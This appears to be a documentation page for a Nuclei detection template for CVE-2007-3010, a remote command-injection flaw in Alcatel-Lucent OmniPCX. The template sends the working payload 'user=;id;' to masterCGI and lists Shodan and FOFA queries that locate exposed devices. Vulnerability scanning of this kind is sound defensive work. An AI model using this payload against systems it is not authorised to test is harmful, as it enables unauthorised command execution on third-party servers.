Alcatel-Lucent OmniPCX - Remote Command Execution
ID: CVE-2007-3010
Severity: critical
Author: king-alexander
Tags: cve,cve2007,kev,rce,alcatel,alcatel-lucent
Description
Section titled “Description”The OmniPCX web interface has a script “masterCGI” with a remote command execution vulnerability via the “user” parameter.
YAML Source
Section titled “YAML Source”id: CVE-2007-3010
info: name: Alcatel-Lucent OmniPCX - Remote Command Execution author: king-alexander severity: critical description: | The OmniPCX web interface has a script "masterCGI" with a remote command execution vulnerability via the "user" parameter. impact: | Any user with access to the web interface could execute arbitrary commands with the permissions of the webservers. remediation: | Update to supported versions that filter shell metacharacters in the "user" parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2007-3010 - https://marc.info/?l=full-disclosure&m=119002152126755&w=2 - http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php - http://www.vupen.com/english/advisories/2007/3185 - http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2007-3010 cwe-id: CWE-20 epss-score: 0.97313 epss-percentile: 0.99874 cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:* metadata: verified: true max-request: 1 vendor: alcatel-lucent product: omnipcx shodan-query: - title:"OmniPCX for Enterprise" - http.title:"omnipcx for enterprise" fofa-query: - app="Alcatel_Lucent-OmniPCX-Enterprise" - app="alcatel_lucent-omnipcx-enterprise" - title="omnipcx for enterprise" google-query: intitle:"omnipcx for enterprise" tags: cve,cve2007,kev,rce,alcatel,alcatel-lucent
http: - method: GET path: - "{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;"
matchers-condition: and matchers: - type: regex part: body regex: - "uid=[0-9]+.*gid=[0-9]+.*"
- type: word part: body words: - "<TITLE>master</TITLE>"
- type: status status: - 200# digest: 4b0a00483046022100bc6bf7bc469cbfbb969011b189a73d3729050f8f20017734caba7654a0b3e3c10221009a1901431d7cb8bb270b5c7e2d1407d9ee6a6615e1559b1c8f27f3cfb61d8afd:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2007/CVE-2007-3010.yaml"